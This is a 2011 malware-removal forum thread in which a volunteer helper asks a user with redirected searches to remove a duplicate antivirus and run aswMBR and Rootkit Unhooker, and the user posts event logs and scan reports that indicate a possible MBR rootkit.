Visual C++ Runtime for Dragon NaturallySpeaking
Watchtower Library 2010 - English
WebFldrs XP
Windows Genuine Advantage Notifications (KB905474)
Windows Genuine Advantage v1.3.0254.0
Windows Imaging Component
Windows Internet Explorer 7
Windows Internet Explorer 8
Windows Live OneCare safety scanner
Windows Media Format 11 runtime
Windows Media Player 10
Windows Media Player 11
Windows PowerShell(TM) 1.0
Windows Resource Kit Tools
WinPatrol
Word in Works Suite add-in
ZipItFree 1.80
.
==== Event Viewer Messages From Past Week ========
.
6/8/2011 9:32:48 AM, error: Service Control Manager [7022] - The AVGIDSAgent service hung on starting.
6/8/2011 9:24:06 AM, error: Service Control Manager [7031] - The AVG WatchDog service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 0 milliseconds: Restart the service.
6/8/2011 9:24:06 AM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the AVGIDSAgent service to connect.
6/8/2011 9:24:06 AM, error: Service Control Manager [7000] - The AVGIDSAgent service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
6/8/2011 11:20:18 AM, error: Service Control Manager [7001] - The MBAMService service depends on the MBAMProtector service which failed to start because of the following error: The system cannot find the file specified.
6/8/2011 11:20:18 AM, error: Service Control Manager [7000] - The MBAMProtector service failed to start due to the following error: The system cannot find the file specified.
6/8/2011 11:07:30 AM, error: Service Control Manager [7023] - The Application Management service terminated with the following error: The specified module could not be found.
6/7/2011 7:52:41 AM, error: Service Control Manager [7000] - The sbapifs service failed to start due to the following error: The parameter is incorrect.
6/7/2011 7:35:03 AM, error: Service Control Manager [7000] - The AVG Mini-Filter Resident Anti-Virus Shield service failed to start due to the following error: The parameter is incorrect.
6/7/2011 12:09:05 PM, error: Service Control Manager [7000] - The Avira AntiVir Guard service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
6/7/2011 12:09:04 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the Avira AntiVir Guard service to connect.
6/6/2011 12:55:22 AM, error: DCOM [10005] - DCOM got error "%1058" attempting to start the service SBAMSvc with arguments "" in order to run the server: {FE7E09CE-BBF4-4698-8BC1-37C9002DAA43}
6/6/2011 1:37:12 PM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: Aavmker4 AFD aswRdr aswSP aswTdi avgio avipbb Beep Fips intelppm IPSec MRxSmb NetBIOS NetBT RasAcd Rdbss SASDIFSV SASKUTIL sbaphd SbTis ssmdrv Tcpip
6/5/2011 4:04:24 PM, error: Service Control Manager [7000] - The SABProcEnum service failed to start due to the following error: The system cannot find the file specified.
6/5/2011 3:44:23 PM, error: DCOM [10005] - DCOM got error "%1058" attempting to start the service wuauserv with arguments "" in order to run the server: {E60687F7-01A1-40AA-86AC-DB1CBF673334}
6/5/2011 3:34:24 AM, error: Service Control Manager [7031] - The .NET Runtime Optimization Service v2.0.50727_X86 service terminated unexpectedly. It has done this 2 time(s). The following corrective action will be taken in 960000 milliseconds: Restart the service.
6/5/2011 3:30:52 AM, error: Service Control Manager [7031] - The .NET Runtime Optimization Service v2.0.50727_X86 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
6/5/2011 3:30:14 PM, error: Service Control Manager [7034] - The PC Tools Security Service service terminated unexpectedly. It has done this 2 time(s).
6/5/2011 2:57:00 AM, error: Service Control Manager [7034] - The PC Tools Security Service service terminated unexpectedly. It has done this 1 time(s).
6/5/2011 2:56:57 AM, error: Service Control Manager [7034] - The PC Tools Auxiliary Service service terminated unexpectedly. It has done this 1 time(s).
6/5/2011 2:53:53 AM, error: Service Control Manager [7034] - The Browser Defender Update Service service terminated unexpectedly. It has done this 1 time(s).
6/5/2011 11:28:48 AM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the PC Tools Security Service service to connect.
6/5/2011 11:28:48 AM, error: Service Control Manager [7000] - The PC Tools Security Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
6/4/2011 3:39:24 PM, error: Service Control Manager [7034] - The Volume Shadow Copy service terminated unexpectedly. It has done this 2 time(s).
6/4/2011 3:39:11 PM, error: Service Control Manager [7034] - The Distributed Transaction Coordinator service terminated unexpectedly. It has done this 2 time(s).
6/4/2011 3:38:57 PM, error: Service Control Manager [7034] - The MS Software Shadow Copy Provider service terminated unexpectedly. It has done this 2 time(s).
6/4/2011 2:31:44 PM, error: Service Control Manager [7034] - The Volume Shadow Copy service terminated unexpectedly. It has done this 1 time(s).
6/4/2011 2:31:19 PM, error: Service Control Manager [7034] - The Distributed Transaction Coordinator service terminated unexpectedly. It has done this 1 time(s).
6/4/2011 2:30:53 PM, error: Service Control Manager [7034] - The MS Software Shadow Copy Provider service terminated unexpectedly. It has done this 1 time(s).
6/4/2011 2:30:16 PM, error: Service Control Manager [7031] - The COM+ System Application service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 1000 milliseconds: Restart the service.
6/4/2011 12:56:20 PM, error: Service Control Manager [7034] - The VIPRE Antivirus service terminated unexpectedly. It has done this 2 time(s).
6/4/2011 12:29:06 PM, error: SideBySide [59] - Generate Activation Context failed for C:\Program Files\Watchtower\Watchtower Library 2010\E\WTLibrary.exe. Reference error message: The operation completed successfully. .
6/4/2011 11:27:19 AM, error: SideBySide [59] - Generate Activation Context failed for C:\Program Files\Avira\AntiVir Desktop\shlext.dll. Reference error message: The operation completed successfully. .
6/4/2011 11:23:24 AM, error: SideBySide [59] - Resolve Partial Assembly failed for Microsoft.VC90.MFC. Reference error message: The referenced assembly is not installed on your system. .
6/4/2011 11:23:24 AM, error: SideBySide [59] - Generate Activation Context failed for C:\Program Files\Avira\AntiVir Desktop\avwsc.exe. Reference error message: The operation completed successfully. .
6/4/2011 11:23:24 AM, error: SideBySide [32] - Dependent Assembly Microsoft.VC90.MFC could not be found and Last Error was The referenced assembly is not installed on your system.
6/4/2011 11:12:23 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service wuauserv with arguments "" in order to run the server: {E60687F7-01A1-40AA-86AC-DB1CBF673334}
6/4/2011 11:11:39 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service StiSvc with arguments "" in order to run the server: {A1F4E726-8CF1-11D1-BF92-0060081ED811}
6/4/2011 11:11:38 AM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: AFD avgio avipbb Beep Fips intelppm IPSec MRxSmb NetBIOS NetBT RasAcd Rdbss sbaphd SbTis ssmdrv Tcpip
6/4/2011 11:11:38 AM, error: Service Control Manager [7001] - The DNS Client service depends on the TCP/IP Protocol Driver service which failed to start because of the following error: A device attached to the system is not functioning.
6/4/2011 11:11:38 AM, error: Service Control Manager [7001] - The DHCP Client service depends on the NetBios over Tcpip service which failed to start because of the following error: A device attached to the system is not functioning.
6/4/2011 11:10:39 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service netman with arguments "" in order to run the server: {BA126AE5-2166-11D1-B1D0-00805FC1270E}
6/4/2011 11:10:28 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service EventSystem with arguments "" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF}
6/4/2011 10:50:36 AM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: Beep
6/4/2011 10:50:33 AM, error: Service Control Manager [7000] - The NLS Service service failed to start due to the following error: The system cannot find the file specified.
6/3/2011 9:04:49 PM, error: Service Control Manager [7006] - The ScRegSetValueExW call failed for Start with the following error: Access is denied.
6/3/2011 7:44:39 PM, error: NtServicePack [4373] - Windows XP Service Pack 3 installation failed.
An internal error occurred.
6/2/2011 12:14:06 PM, error: Service Control Manager [7034] - The SB Recovery Service service terminated unexpectedly. It has done this 1 time(s).
6/2/2011 12:14:00 PM, error: Service Control Manager [7034] - The VIPRE Antivirus service terminated unexpectedly. It has done this 1 time(s).
6/2/2011 12:14:00 PM, error: Service Control Manager [7022] - The VIPRE Antivirus service hung on starting.
6/2/2011 12:12:18 PM, error: Service Control Manager [7022] - The Avira AntiVir Guard service hung on starting.
.
==== End Of File ===========================
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 11th, 2011, 10:02 am

Hi and welcome to the MR forums. :)

I'm melboy and I am going to try to help you with your problem. Please take note of the following:

  1. I will be working on your Malware issues; this may or may not solve other issues you have with your machine.
  2. The fixes are specific to your problem and should only be used for this issue on this machine.
  3. If you don't know or understand something, please don't hesitate to ask.
  4. Please refrain from making any further changes to your computer (Install/Uninstall programs, delete files, edit the registry, etc...)
  5. Please DO NOT run any other tools or scans whilst I am helping you.
  6. It is important that you reply to this thread. Do not start a new topic.
  7. DO NOT attach logs unless requested to. Please copy/paste all requested logs into your replies.
  8. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.
  9. Absence of symptoms does not mean that everything is clear.


NOTE: Please take time to read the Malware Removal Forum Guidelines and Rules where the conditions for receiving help at this forum are explained.


IMPORTANT: Please be aware that removing Malware is a potentially hazardous undertaking. I will take care not to knowingly suggest courses of action that might damage your computer. However it is impossible for me to foresee all interactions that may happen between the software on your computer and those we'll use to clear you of infection, and I cannot guarantee the safety of your system. It is possible that we might encounter situations where the only recourse is to re-format and re-install your operating system, or to necessitate you taking your computer to a repair shop.

Because of this, I advise you to backup any personal files and folders before you start.



No Reply Within 3 Days Will Result In Your Topic Being Closed!! If you need more time, please inform me.


===========================================


Multiple Anti Virus programs.

  • Avira AntiVir
  • VIPRE Antivirus

Please ensure Vipre Antivirus is fully removed.

It is NOT safe to have more than one anti-virus installed on a system; doing so not only does not provide better protection, it will actually cause additional problems. Anti-virus programs patch into the system kernel. Having more than one anti-virus patching into the system kernel will not only destabilize a system, it can corrupt system files and it WILL cause crashes! You MUST remove all but one anti-virus program.

  • Click Start
  • Go to Control Panel
  • Go to Add/Remove Programs
  • Find and click Remove for the following (if present):
VIPRE Antivirus

Then download VPPClean.exe from Here & save it to your desktop.

  • Double click VPPClean.exe to run it.
  • Click the Clean button.
  • Click Yes to the prompt.
  • If prompted to Reboot, please do so.



aswMBR

Download aswMBR and save it to your Desktop.

  • Double click aswMBR.exe to run it.
  • Click the Scan button.
  • After a short while when the scan reports "Scan finished successfully", click Save log & save the log to your desktop.
  • Click OK
  • Two files will be created, aswMBR.txt & a file named MBR.dat
  • Save MBR.dat to a form of removable media. (CD, DVD, USB flash drive etc) - This is a backup of your MBR. Do not delete this file.
  • NOTE: Do not click to fix anything at this stage!
  • Click EXIT.
  • Copy & Paste the contents of aswMBR.txt into your next reply.



Rootkit Unhooker

Download Rootkit Unhooker and save it to your desktop.

  • Double click RKUnhookerLE.exe to run it.
  • Click the Report tab, then click Scan.
  • Check Drivers and Stealth, uncheck the rest, then click OK.
  • Wait till the scanner has finished and then click File, Save Report.
  • Save the report somewhere where you can find it. (eg. desktop) then Click Close.
  • Copy the entire contents of the report and paste it in a reply here.

Note: you may get the following warning; just click OK and continue.
"Rootkit Unhooker has detected a parasite inside itself!
It is recommended to remove parasite, okay?"





In your next reply:
  1. aswMBR.txt
  2. Report.txt
melboy
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 12th, 2011, 2:59 am

Hi melboy -

VIPRE Antivirus removed

VPPClean.exe run

aswMBR.exe run

RKUnhookerLE.exe run

aswMBR.txt and Report.txt below


aswMBR version 0.9.6.399 Copyright(c) 2011 AVAST Software
Run date: 2011-06-12 02:27:40
-----------------------------
02:27:40.890 OS Version: Windows 5.1.2600 Service Pack 3
02:27:40.890 Number of processors: 1 586 0x403
02:27:40.890 ComputerName: OWLDELL UserName: admin
02:27:42.375 Initialize success
02:29:48.984 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-0
02:29:48.984 Disk 0 Vendor: Maxtor_6 YAR5 Size: 152587MB BusType: 3
02:29:49.015 Disk 0 MBR read successfully
02:29:49.015 Disk 0 MBR scan
02:29:49.015 Disk 0 unknown MBR code
02:29:49.015 Disk 0 scanning sectors +312496380
02:29:49.046 Disk 0 scanning C:\WINDOWS\system32\drivers
02:29:56.265 Service scanning
02:29:58.671 Disk 0 trace - called modules:
02:29:58.671 ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x828001ed]<<
02:29:58.687 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x83184ab8]
02:29:58.687 3 CLASSPNP.SYS[f8527fd7] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-0[0x83193030]
02:29:58.687 \Driver\iastor[0x831d3a08] -> IRP_MJ_INTERNAL_DEVICE_CONTROL -> 0x828001ed
02:29:58.703 Scan finished successfully
02:30:35.812 Disk 0 MBR has been saved successfully to "C:\Documents and Settings\admin\Desktop\MBR.dat"
02:30:35.812 The log file has been saved successfully to "C:\Documents and Settings\admin\Desktop\aswMBR.txt"


RkU Version: 3.8.389.593, Type LE (SR2)
==============================================
OS Name: Windows XP
Version 5.1.2600 (Service Pack 3)
Number of processors #1
==============================================
>Drivers
==============================================
0xBF0B2000 C:\WINDOWS\System32\ati3duag.dll 2297856 bytes (ATI Technologies Inc. , ati3duag.dll)
0x804D7000 C:\WINDOWS\system32\ntkrnlpa.exe 2154496 bytes (Microsoft Corporation, NT Kernel & System)
0x804D7000 PnpManager 2154496 bytes
0x804D7000 RAW 2154496 bytes
0x804D7000 WMIxWDM 2154496 bytes
0xBF800000 Win32k 1859584 bytes
0xBF800000 C:\WINDOWS\System32\win32k.sys 1859584 bytes (Microsoft Corporation, Multi-User Win32 Driver)
0xF7FB4000 C:\WINDOWS\system32\DRIVERS\ati2mtag.sys 1073152 bytes (ATI Technologies Inc., ATI Radeon WindowsNT Miniport Driver)
0xF58E3000 C:\WINDOWS\System32\Drivers\dump_iastor.sys 872448 bytes
0xF829B000 iastor.sys 872448 bytes (Intel Corporation, Intel Matrix Storage Manager driver)
0xBF2E3000 C:\WINDOWS\System32\ativvaxx.dll 610304 bytes (ATI Technologies Inc. , Radeon Video Acceleration Universal Driver)
0xF81B2000 Ntfs.sys 577536 bytes (Microsoft Corporation, NT File System Driver)
0xF5AD3000 C:\WINDOWS\system32\DRIVERS\mrxsmb.sys 458752 bytes (Microsoft Corporation, Windows NT SMB Minirdr)
0xF7E47000 C:\WINDOWS\system32\DRIVERS\update.sys 385024 bytes (Microsoft Corporation, Update Driver)
0xF5C00000 C:\WINDOWS\system32\DRIVERS\tcpip.sys 364544 bytes (Microsoft Corporation, TCP/IP Protocol Driver)
0xB7F17000 C:\WINDOWS\system32\DRIVERS\srv.sys 360448 bytes (Microsoft Corporation, Server driver)
0xBF378000 C:\WINDOWS\System32\ATMFD.DLL 290816 bytes (Adobe Systems Incorporated, Windows NT OpenType/Type 1 Font Driver)
0xBF012000 C:\WINDOWS\System32\ati2dvag.dll 245760 bytes (ATI Technologies Inc., ATI Radeon WindowsNT Display Driver)
0xBF04E000 C:\WINDOWS\System32\ati2cqag.dll 204800 bytes (ATI Technologies Inc., Central Memory Manager / Queue Server Module)
0xBF080000 C:\WINDOWS\System32\atikvmag.dll 204800 bytes (ATI Technologies Inc., Virtual Command And Memory Manager)
0xF83B8000 ACPI.sys 188416 bytes (Microsoft Corporation, ACPI Driver for NT)
0xF59E0000 C:\WINDOWS\System32\Drivers\cam1690.sys 184320 bytes (-, USB Camera Driver)
0xB85B6000 C:\WINDOWS\system32\DRIVERS\mrxdav.sys 184320 bytes (Microsoft Corporation, Windows NT WebDav Minirdr)
0xF8185000 NDIS.sys 184320 bytes (Microsoft Corporation, NDIS 5.1 wrapper driver)
0xF5D33000 C:\WINDOWS\system32\drivers\sthda.sys 180224 bytes (SigmaTel, Inc., NDRC)
0xB7A96000 C:\WINDOWS\system32\drivers\kmixer.sys 176128 bytes (Microsoft Corporation, Kernel Mode Audio Mixer)
0xF5B43000 C:\WINDOWS\system32\DRIVERS\rdbss.sys 176128 bytes (Microsoft Corporation, Redirected Drive Buffering SubSystem Driver)
0xF7F78000 C:\WINDOWS\system32\DRIVERS\HDAudBus.sys 163840 bytes (Windows (R) Server 2003 DDK provider, High Definition Audio Bus Driver v1.0a)
0xF5BD8000 C:\WINDOWS\system32\DRIVERS\netbt.sys 163840 bytes (Microsoft Corporation, MBT Transport driver)
0xF5AAD000 C:\WINDOWS\system32\DRIVERS\avipbb.sys 155648 bytes (Avira GmbH, Avira Driver for Security Enhancement)
0xF7F2E000 C:\WINDOWS\system32\DRIVERS\e100b325.sys 155648 bytes (Intel Corporation, Intel(R) PRO/100 Adapter NDIS 5.1 driver)
0xF5BB2000 C:\WINDOWS\system32\DRIVERS\ipnat.sys 155648 bytes (Microsoft Corporation, IP Network Address Translator)
0xF7ECD000 C:\WINDOWS\system32\drivers\portcls.sys 147456 bytes (Microsoft Corporation, Port Class (Class Driver for Port/Miniport Devices))
0xF7F54000 C:\WINDOWS\system32\DRIVERS\USBPORT.SYS 147456 bytes (Microsoft Corporation, USB 1.1 & 2.0 Port Driver)
0xF7F0B000 C:\WINDOWS\system32\DRIVERS\ks.sys 143360 bytes (Microsoft Corporation, Kernel CSA Library)
0xF5B90000 C:\WINDOWS\System32\drivers\afd.sys 139264 bytes (Microsoft Corporation, Ancillary Function Driver for WinSock)
0xF5B6E000 C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS 139264 bytes (SUPERAdBlocker.com and SUPERAntiSpyware.com, SASKUTIL.SYS)
0x806E5000 ACPI_HAL 134400 bytes
0x806E5000 C:\WINDOWS\system32\hal.dll 134400 bytes (Microsoft Corporation, Hardware Abstraction Layer DLL)
0xF827B000 fltmgr.sys 131072 bytes (Microsoft Corporation, Microsoft Filesystem Filter Manager)
0xF8388000 ftdisk.sys 126976 bytes (Microsoft Corporation, FT Disk Driver)
0xF816B000 Mup.sys 106496 bytes (Microsoft Corporation, Multiple UNC Provider driver)
0xF7EF1000 C:\WINDOWS\system32\drivers\pbsaudrv.sys 106496 bytes (PolderbitS Software, PolderbitS Audio Driver)
0xF8370000 atapi.sys 98304 bytes (Microsoft Corporation, IDE/ATAPI Port Driver)
0xF8252000 KSecDD.sys 94208 bytes (Microsoft Corporation, Kernel Security Support Provider Interface)
0xF7EB6000 C:\WINDOWS\system32\DRIVERS\ndiswan.sys 94208 bytes (Microsoft Corporation, MS PPP Framing Driver (Strong Encryption))
0xB8773000 C:\WINDOWS\system32\DRIVERS\avgntflt.sys 86016 bytes (Avira GmbH, Avira Minifilter Driver)
0xB84D9000 C:\WINDOWS\system32\drivers\wdmaud.sys 86016 bytes (Microsoft Corporation, MMSYSTEM Wave/Midi API mapper)
0xF7FA0000 C:\WINDOWS\system32\DRIVERS\VIDEOPRT.SYS 81920 bytes (Microsoft Corporation, Video Port Driver)
0xF5C59000 C:\WINDOWS\system32\DRIVERS\ipsec.sys 77824 bytes (Microsoft Corporation, IPSec Driver)
0xF823F000 WudfPf.sys 77824 bytes (Microsoft Corporation, Windows Driver Foundation - User-mode Driver Framework Platform Driver)
0xBF000000 C:\WINDOWS\System32\drivers\dxg.sys 73728 bytes (Microsoft Corporation, DirectX Graphics Driver)
0xF8269000 sr.sys 73728 bytes (Microsoft Corporation, System Restore Filesystem Filter Driver)
0xF83A7000 pci.sys 69632 bytes (Microsoft Corporation, NT Plug and Play PCI Enumerator)
0xF7EA5000 C:\WINDOWS\system32\DRIVERS\psched.sys 69632 bytes (Microsoft Corporation, MS QoS Packet Scheduler)
0xF86B7000 C:\WINDOWS\System32\Drivers\Cdfs.SYS 65536 bytes (Microsoft Corporation, CD-ROM File System Driver)
0xF8567000 C:\WINDOWS\system32\DRIVERS\cdrom.sys 65536 bytes (Microsoft Corporation, SCSI CD-ROM Driver)
0xF8597000 C:\WINDOWS\system32\drivers\drmk.sys 61440 bytes (Microsoft Corporation, Microsoft Kernel DRM Descrambler Filter)
0xF8577000 C:\WINDOWS\system32\DRIVERS\redbook.sys 61440 bytes (Microsoft Corporation, Redbook Audio Filter Driver)
0xF5A7D000 C:\WINDOWS\system32\drivers\sysaudio.sys 61440 bytes (Microsoft Corporation, System Audio WDM Filter)
0xF8647000 C:\WINDOWS\system32\DRIVERS\usbhub.sys 61440 bytes (Microsoft Corporation, Default Hub Driver for USB)
0xF8527000 C:\WINDOWS\system32\DRIVERS\CLASSPNP.SYS 53248 bytes (Microsoft Corporation, SCSI Class System Dll)
0xF85B7000 C:\WINDOWS\system32\DRIVERS\rasl2tp.sys 53248 bytes (Microsoft Corporation, RAS L2TP mini-port/call-manager driver)
0xF7DA7000 C:\WINDOWS\System32\Drivers\STREAM.SYS 53248 bytes (Microsoft Corporation, WDM CODEC Class Device Driver 2.0)
0xF8507000 VolSnap.sys 53248 bytes (Microsoft Corporation, Volume Shadow Copy Driver)
0xF85D7000 C:\WINDOWS\system32\DRIVERS\raspptp.sys 49152 bytes (Microsoft Corporation, Peer-to-Peer Tunneling Protocol)
0xF85A7000 C:\WINDOWS\system32\drivers\tbhsd.sys 49152 bytes (RapidSolution Software AG, Tunebite High-Speed Dubbing)
0xB7B31000 C:\DOCUME~1\admin\LOCALS~1\Temp\aswMBR.sys 45056 bytes
0xF86C7000 C:\WINDOWS\System32\Drivers\Fips.SYS 45056 bytes (Microsoft Corporation, FIPS Crypto Driver)
0xF8587000 C:\WINDOWS\system32\DRIVERS\imapi.sys 45056 bytes (Microsoft Corporation, IMAPI Kernel Driver)
0xF84F7000 MountMgr.sys 45056 bytes (Microsoft Corporation, Mount Manager)
0xF85C7000 C:\WINDOWS\system32\DRIVERS\raspppoe.sys 45056 bytes (Microsoft Corporation, RAS PPPoE mini-port/call-manager driver)
0xF84E7000 isapnp.sys 40960 bytes (Microsoft Corporation, PNP ISA Bus Driver)
0xF8637000 C:\WINDOWS\System32\Drivers\NDProxy.SYS 40960 bytes (Microsoft Corporation, NDIS Proxy)
0xF8607000 C:\WINDOWS\system32\DRIVERS\rrnetcap.sys 40960 bytes (RapidSolution Software AG, Intermediate Filter Driver)
0xF85F7000 C:\WINDOWS\system32\DRIVERS\termdd.sys 40960 bytes (Microsoft Corporation, Terminal Server Driver)
0xB7BE1000 C:\WINDOWS\System32\Drivers\BlackBox.SYS 36864 bytes (RKU Driver)
0xF8517000 disk.sys 36864 bytes (Microsoft Corporation, PnP Disk Driver)
0xF86D7000 C:\WINDOWS\system32\DRIVERS\HIDCLASS.SYS 36864 bytes (Microsoft Corporation, Hid Class Library)
0xF8557000 C:\WINDOWS\system32\DRIVERS\intelppm.sys 36864 bytes (Microsoft Corporation, Processor Device Driver)
0xF85E7000 C:\WINDOWS\system32\DRIVERS\msgpc.sys 36864 bytes (Microsoft Corporation, MS General Packet Classifier)
0xF86A7000 C:\WINDOWS\system32\DRIVERS\netbios.sys 36864 bytes (Microsoft Corporation, NetBIOS interface driver)
0xF8537000 PxHelp20.sys 36864 bytes (Sonic Solutions, Px Engine Device Driver for Windows 2000/XP)
0xF8697000 C:\WINDOWS\system32\DRIVERS\wanarp.sys 36864 bytes (Microsoft Corporation, MS Remote Access and Routing ARP Driver)
0xF88EF000 C:\WINDOWS\System32\Drivers\Npfs.SYS 32768 bytes (Microsoft Corporation, NPFS Driver)
0xF882F000 C:\WINDOWS\system32\DRIVERS\usbccgp.sys 32768 bytes (Microsoft Corporation, USB Common Class Generic Parent Driver)
0xF88DF000 C:\WINDOWS\system32\DRIVERS\usbehci.sys 32768 bytes (Microsoft Corporation, EHCI eUSB Miniport Driver)
0xF87A7000 C:\WINDOWS\system32\DRIVERS\fdc.sys 28672 bytes (Microsoft Corporation, Floppy Disk Controller Driver)
0xF889F000 C:\WINDOWS\system32\DRIVERS\HIDPARSE.SYS 28672 bytes (Microsoft Corporation, Hid Parsing Library)
0xF8767000 C:\WINDOWS\system32\DRIVERS\PCIIDEX.SYS 28672 bytes (Microsoft Corporation, PCI IDE Bus Driver Extension)
0xF88A7000 C:\WINDOWS\system32\DRIVERS\usbprint.sys 28672 bytes (Microsoft Corporation, USB Printer driver)
0xF87DF000 C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS 28672 bytes (Microsoft Corporation, USB Mass Storage Class Driver)
0xF8777000 C:\WINDOWS\system32\DRIVERS\kbdclass.sys 24576 bytes (Microsoft Corporation, Keyboard Class Driver)
0xF8797000 C:\WINDOWS\system32\DRIVERS\mouclass.sys 24576 bytes (Microsoft Corporation, Mouse Class Driver)
0xF87CF000 C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS 24576 bytes (SUPERAdBlocker.com and SUPERAntiSpyware.com, SASDIFSV.SYS)
0xF8787000 C:\WINDOWS\system32\DRIVERS\ssmdrv.sys 24576 bytes (Avira GmbH, AVIRA SnapShot Driver)
0xF88AF000 C:\WINDOWS\system32\DRIVERS\usbuhci.sys 24576 bytes (Microsoft Corporation, UHCI USB Miniport Driver)
0xF88B7000 C:\WINDOWS\System32\drivers\vga.sys 24576 bytes (Microsoft Corporation, VGA/Super VGA Video Driver)
0xF8867000 C:\WINDOWS\system32\DRIVERS\flpydisk.sys 20480 bytes (Microsoft Corporation, Floppy Driver)
0xF88CF000 C:\WINDOWS\System32\Drivers\Msfs.SYS 20480 bytes (Microsoft Corporation, Mailslot driver)
0xF8817000 C:\WINDOWS\system32\DRIVERS\omci.sys 20480 bytes (Dell Computer Corporation, OMCI Device Driver)
0xF876F000 PartMgr.sys 20480 bytes (Microsoft Corporation, Partition Manager)
0xF88C7000 C:\WINDOWS\system32\DRIVERS\ptilink.sys 20480 bytes (Parallel Technologies, Inc., Parallel Technologies DirectParallel IO Library)
0xF88D7000 C:\WINDOWS\system32\DRIVERS\raspti.sys 20480 bytes (Microsoft Corporation, PTI DirectParallel(R) mini-port/call-manager driver)
0xF8897000 C:\WINDOWS\system32\DRIVERS\TDI.SYS 20480 bytes (Microsoft Corporation, TDI Wrapper)
0xF87EF000 C:\WINDOWS\System32\watchdog.sys 20480 bytes (Microsoft Corporation, Watchdog Driver)
0xB8110000 C:\WINDOWS\System32\drivers\aspi32.sys 16384 bytes (Adaptec, ASPI for WIN32 Kernel Driver)
0xB7D19000 C:\WINDOWS\system32\DRIVERS\asyncmac.sys 16384 bytes (Microsoft Corporation, MS Remote Access serial network driver)
0xF5C90000 C:\WINDOWS\system32\DRIVERS\kbdhid.sys 16384 bytes (Microsoft Corporation, HID Mouse Filter Driver)
0xF80DE000 C:\WINDOWS\system32\DRIVERS\mssmbios.sys 16384 bytes (Microsoft Corporation, System Management BIOS Driver)
0xF88F7000 C:\WINDOWS\system32\BOOTVID.dll 12288 bytes (Microsoft Corporation, VGA Boot Driver)
0xF59C0000 C:\WINDOWS\System32\drivers\Dxapi.sys 12288 bytes (Microsoft Corporation, DirectX API Driver)
0xF89C7000 C:\WINDOWS\system32\DRIVERS\hidusb.sys 12288 bytes (Microsoft Corporation, USB Miniport Driver for Input Devices)
0xF89BF000 C:\WINDOWS\System32\Drivers\i2omgmt.SYS 12288 bytes (Microsoft Corporation, I2O Utility Filter)
0xB8118000 C:\WINDOWS\system32\DRIVERS\MaVc2K.sys 12288 bytes (Mobile Action Technology Inc., Mobile Action Virtual Control)
0xF5C88000 C:\WINDOWS\system32\DRIVERS\mouhid.sys 12288 bytes (Microsoft Corporation, HID Mouse Filter Driver)
0xF812A000 C:\WINDOWS\system32\DRIVERS\ndistapi.sys 12288 bytes (Microsoft Corporation, NDIS 3.0 connection wrapper driver)
0xF89CF000 C:\WINDOWS\system32\DRIVERS\rasacd.sys 12288 bytes (Microsoft Corporation, RAS Automatic Connection Driver)
0xF8A17000 C:\Program Files\Avira\AntiVir Desktop\avgio.sys 8192 bytes (Avira GmbH, Avira AntiVir Support for Minifilter)
0xF8A65000 C:\WINDOWS\system32\DRIVERS\dsunidrv.sys 8192 bytes (Gteko Ltd., GUniDriver)
0xF8A03000 C:\WINDOWS\System32\Drivers\Fs_Rec.SYS 8192 bytes (Microsoft Corporation, File System Recognizer Driver)
0xF89E7000 C:\WINDOWS\system32\KDCOM.DLL 8192 bytes (Microsoft Corporation, Kernel Debugger HW Extension DLL)
0xF8A07000 C:\WINDOWS\System32\Drivers\mnmdd.SYS 8192 bytes (Microsoft Corporation, Frame buffer simulator)
0xF8A0B000 C:\WINDOWS\System32\DRIVERS\RDPCDD.sys 8192 bytes (Microsoft Corporation, RDP Miniport)
0xF89F7000 C:\WINDOWS\system32\DRIVERS\swenum.sys 8192 bytes (Microsoft Corporation, Plug and Play Software Device Enumerator)
0xF89FF000 C:\WINDOWS\system32\DRIVERS\USBD.SYS 8192 bytes (Microsoft Corporation, Universal Serial Bus Driver)
0xF89E9000 C:\WINDOWS\system32\DRIVERS\WMILIB.SYS 8192 bytes (Microsoft Corporation, WMILIB WMI support library Dll)
0xF8ADC000 C:\WINDOWS\system32\DRIVERS\audstub.sys 4096 bytes (Microsoft Corporation, AudStub Driver)
0xF8B9C000 C:\WINDOWS\System32\drivers\dxgthk.sys 4096 bytes (Microsoft Corporation, DirectX Graphics Driver Thunk)
0xF8B82000 C:\WINDOWS\System32\Drivers\Null.SYS 4096 bytes (Microsoft Corporation, NULL Driver)
0xF8AAF000 pciide.sys 4096 bytes (Microsoft Corporation, Generic PCI IDE Bus Driver)
==============================================
>Stealth
==============================================
0x82801A91 Unknown page with executable code, 1391 bytes
0x82800288 Unknown page with executable code, 3448 bytes
0x82802191 Unknown page with executable code, 3695 bytes
0xF8507000 WARNING: Virus alike driver modification [VolSnap.sys], 53248 bytes
0x82804E7A Unknown thread object [ ETHREAD 0x827BD260 ] TID: 144, 600 bytes
0x82807008 Unknown thread object [ ETHREAD 0x82789020 ] TID: 148, 600 bytes
0x82806CDC Unknown page with executable code, 804 bytes
ard
Regular Member
 
Posts: 41
